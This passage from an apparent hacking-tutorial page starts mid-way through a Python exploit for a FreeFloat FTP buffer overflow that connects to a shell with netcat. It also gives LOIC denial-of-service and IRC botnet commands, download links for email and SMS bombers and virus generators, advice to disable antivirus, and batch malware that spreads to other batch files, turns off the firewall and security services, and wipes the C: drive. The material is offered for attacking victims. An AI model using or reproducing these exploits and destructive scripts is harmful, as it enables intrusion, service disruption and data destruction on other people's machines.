      sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"

      sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"

      sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"


      padding = "A"*246

      sled = "\x90"*20

      jmpesp = struct.pack('

      sploit = padding + jmpesp + sled + sc

      s = socket(AF_INET,SOCK_STREAM)

      s.connect((host,port))

      s.recv(1024)

      s.send("USER test\r\n")

      s.recv(1024)

      s.send("PASS test\r\n")

      s.recv(1024)

      s.send("ACCL "+sploit+"\r\n")

      s.close()


if __name__ == '__main__':

      if (len(sys.argv) < 3):

         print "\nUsage: freefloat.py \n"

         sys.exit()

      else:

         host = sys.argv[1]

         port = sys.argv[2]

         sploit(host, int(port))

         os.system("nc " + host + " 4444")

Email and SMS Bombs

An Email Bomb is a form of net abuse consisting of sending huge volumes of email to an address in an attempt to overflow the mailbox or overwhelm the server where the email address is hosted in a Denial of Service Attack


Email bombing

Email bombing is characterized by abusers repeatedly sending an email message to a particular address at a specific victim site. In many instances, the messages will be large and constructed from meaningless data in an effort to consume additional system and network resources. Multiple accounts at the target site may be abused increasing the denial of service impact.


Zip bombing

A ZIP Bomb is a variant of mail-bombing. After most commercial mail servers began checking mail with anti-virus software and filtering certain malicious file types (EXE, RAR, Zip or 7-Zip). Mail server software was then configured to unpack archives and check their contents as well. A new idea to combat this solution was composing a "bomb" consisting of an enormous text files, containing, for example, only the letter z repeating millions of times. Such a file compresses into a relatively small archive, but its unpacking (especially by early versions of mail servers) would use a greater amount of processing, which could result in a DoS (Denial of Service).


Mass mailing

Mass mailing consists of sending numerous duplicate mails to the same email address. These types of mail bombs are simple to design but their extreme simplicity means they can be easily detected by spam filters. Email Bombing using mass mailing is also commonly performed as a DDoS Attack by employing the use of zombie botnets; hierarchical networks of computers compromised by malware and under the attacker's control. Similar to their use in spamming, the attacker instructs the botnet to send out millions or even billions of emails, but unlike normal botnet spamming, the emails are all addressed to only one or a few addresses the attacker wishes to flood. This form of email bombing is similar in purpose to other DDoS Flooding Attacks. As the targets are frequently the dedicated hosts handling website and email accounts of a business, this type of attack can be just as devastating to both services of the host.

This type of attack is more difficult to defend against than a simple mass-mailing bomb because of the multiple source addresses and the possibility of each zombie computer sending a different message or employing stealth techniques to defeat spam filters.


Technical Issues

- If you provide email services to your user community, your users are vulnerable to email bombing and   spamming.

- Email spamming is almost impossible to prevent because a user with a valid email address can spam any   other valid email address, newsgroup, or bulletin-board service.

- When large amounts of email are directed to or through a single site, the site may suffer a denial of   service through loss of network connectivity, system crashes, or failure of a service because of:

- overloading network connections

- using all available system resources

- filling the disk as a result of multiple postings and resulting syslog entries


Working Email and SMS Bombers

Dank Messenger

You can download Dank Messenger here

======================================================================

SMS Bomber

You can download SMS Bomber here


Prevention

Unfortunately, at this time, there is no way to prevent email bombing or spamming (other than disconnecting from the Internet), and it is impossible to predict the origin of the next attack. It is trivial to obtain access to large mailing lists or information resources that contain large volumes of email addresses that will provide destination email addresses for the spam.

- Develop in-house tools to help you recognize and respond to the email bombing/spamming and so   minimize the impact of such activity. The tools should increase the logging capabilities as well as check   for and alert you to incoming/outgoing messages that originate from the same user or same site in a very   short span of time. Once you identify the activity, you can use other in-house tools to discard the   messages from the offending users or sites.

- If your site uses a small number of email servers, you may want to configure your firewall to ensure that   SMTP connections from outside your firewall can be made only to your central email hubs and to none of   your other systems. Although this will not prevent an attack, it minimizes the number of machines   available to an intruder for an SMTP-based attack (whether that attack is a email spam or an attempt to   break into a host). It also means that should you wish to control incoming SMTP in a particular way   (through filtering or another means), you have only a small number of systems--the main email hub and   any backup email hubs--to configure.

- Consider configuring your mail handling system(s) to deliver email into filesystems that have per-user   quotas enabled. Doing this can minimize the impact of an email bombing attack by limiting the damage to   only the targeted accounts and not the entire system.

- Educate your users to call you about email bombing and spamming.

- Do not propagate the problem by forwarding (or replying to) spammed email.

Low Orbit Ion Cannon

Low Orbit Ion Cannon, often abbreviated as LOIC, is an open source network stress testing application, written in C#. A JavaScript version has also been created enabling a DoS from a web browser. LOIC was initially developed by Praetox Technologies but later it was released into the public domain. LOIC is an acronym for Low Orbit Ion Cannon. A fictional weapon in the Command & Conquer series of video games.

Low Orbit Ion Canon

LOIC performs a Denial of Service (DoS) attack on a target site by flooding the server with TCP packets or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

Countermeasures

Security experts indicated that well-written firewall rules can filter out most traffic from DDoS attacks by LOIC, thus preventing the attacks from being fully effective.

Anonymous

LOIC was utilized by Project Chanology, an offshoot of the Anonymous group, to attack Scientology websites, then by Anonymous itself to successfully attack the Recording Industry Association of America's website in October 2010 and again during Operation Payback in December 2010 to attack the websites of companies and organizations that opposed WikiLeaks. LOIC was utilized by many attackers, despite the fact that a network firewall could easily filter out network traffic it generates, thus rendering it only partly effective.

If an attack is not routed through an anonymization network such as Tor, traceable IP address records can be logged by its recipient. This can be used to identify the individual user conducting DDoS attacks from logs kept by their ISPs. On January 2011 five people were arrested in the UK in connection with the Operation Payback attacks, while in June 2011 a further three LOIC users were arrested in Spain for their involvement in the web attacks. In June 2011 it was reported that Turkish police arrested 32 individuals who allegedly attacked government websites in protest against the introduction of state level web filtering. The individuals are thought to be members of Anonymous that used the LOIC tool in their protest.

Download LOIC v1.1.1.25 here

Download NewEraCracker LOIC 1.1.1.25 here

Download NewEraCracker LOIC 1.1.1.25 (tar) here

How to run on Windows

Get the binaries

Requires Microsoft .NET Framework 3.5 Service Pack 1

How to run on Linux / Mac OSX

Run debug binaries with mono. Read the wiki at https://github.com/NewEraCracker/LOIC/wiki/ for updated instructions

Hivemind/Hidden Mode

Hivemind mode will connect your client to an IRC server so it can be controlled remotely. Think of this as a voluntary botnet. NOTE: It does NOT allow remote administration of your machine, or anything like that; it is literally just control of loic itself.

If you want to start up in Hivemind mode run something like this:

LOIC.exe /hivemind irc.server.address

It will connect to irc://irc.server.adress:6667/loic

You can also specify a port and channel:

LOIC.exe /hivemind irc.server.address 1234 #secret

It will connect to irc://irc.server.adress:1234/secret

In order to do Hivemind Hidden mode, run something like this:

LOIC.exe /hidden /hivemind irc.server.address

It will connect to irc://irc.server.adress:6667/loic without any visible GUI.

Controlling LOIC from PC

As an OP, Admin or owner, set the channel topic or send a message like the following:

!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false random=true

To start an attack type:

!lazor start

Or just append "start" to the END of the topic:

!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false random=true start

To reset loic's options back to its defaults:

!lazor default

To stop an attack:

!lazor stop

and be sure to remove "start" from the END of the topic, if it exists, too.

Necro Virus Maker

You can change the options to make the virus as u want
to fool ur friends and have fun...
But be careful with the files u will built
because some of them are really dangerous...

The virus maker is Safe!!! Not malware, no addware, not trojan... Nadda...
Safe!
The antivirus will detect it as virus tho because its a "bad" program...
Bull***t
Just deactivate it...
And if you still believe that its a virus then please, DONT DOWNLOAD IT!!!

Download it here

Shadow Batch Virus Generator

Today is about virus , there are 2 software that i wanna share .


1 - Shadow Batch Virus Generator
2 - TeraBIT Virus Maker



Here is the things that you gonna  to make Virus:


(1). In Shadow Batch Virus Generator

1. First of all download the virus maker from here

3. You can use various options to make virus to suit your needs. You can:

Infect files of various extensions
Insert virus in startup menu, Kill various processes.
Disable all security services like Windows Defender, Antivirus, Firewall.
Rename file extensions, spread virus via file sharing.
Create new admin account, change user account password.
Block various websites, download trojan files to victim computer, shutdown victim computer and much more.

4. After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.
5. Now, you have your virus ready to hack your victim. This virus maker is undetectable by the most antiviruses.

I am not responsible for any action performed by you. Also, do not try this virus on your own computer. This virus software is one of the most efficient virus software used today.

(2) TeraBIT Virus Maker

Download it here

These two virus makers are detected as a viruses by the most anti-virus softwares, but they won't harm your pc in any way. Before you run these virus makers disable your anti-virus temporarily.

If you know other virus makers i want to hear your suggestions.

Building a Batch Virus

In DOS, OS/2 and Microsoft Windows a Batch File is a text file containing a series of commands intended to be executed by the command interpreter. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands. Batch files are useful for running a sequence of executables automatically and are often used to automate repetitive or tedious processes.

DOS batch files have the filename extension .bat. Batch files for other environments may have different extensions, e.g. .cmd or .bat in the Microsoft Windows NT-family of operating systems and OS/2, or .btm in 4DOS and 4NT related shells. The Windows 9x family of operating systems only recognize the .bat extension






Example Commands

Swap mouse buttons:

rundll32 user,swapmousebutton

Open the URL you want:

start http://www.google.com

Shut down the computer and show any message you want:

shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f

Disable mouse till next restart:

rundll32 mouse,disable

Disable keyboard till next restart:

rundll32 keyboard,disable

Freezes computer till restart:

rundll32 user,disableoemlayer

=======================================================================


Worm commands:

That command (two lines) will copy itself to any batch file in the directory.

ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"

Clears other batch file's source and copies itself to it.

%0 >>other.bat

=======================================================================


Trojan Codes:

Sends list of files in same directory into a text document, and places it into a text document in the same directory.

dir *.*>>Filelist.txt

Changes specific user account's password to whatever you want.

net user administrator PASSWORD HERE

Creates a text file with ip address information in same directory as batch file.

ipconfig >Computer-IP-address.txt

Copies itself to the AutoRun section of windows.

COPY %0 %windir%WINSTART.BAT

Formats c drive without asking.

format c: /q /autotest

Deletes windows

DELTREE /Y %windir%

Deletes C: Drive, /F means forced, /S deletes whole tree, /Q makes it quiet so it does not ask permittion.

DEL /F /S /Q C:

This is a potential Time-Bomb virus and remember to change the date!

Quote:@echo off
echo. | date | find /c /i "2005.05.10" > NUL
If errorlevel 1 GoTo End
YOUR 'VIRUS' CODE HERE.
:End

The following will turn off the firewall and stop the security center.

Quote:net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS
haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw
uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

This code is also a Time-Bomb

@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo You got owned!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start http://www.fbi.gov
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices
SharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
Serviceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Services
wscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Your computer is destroyed" -f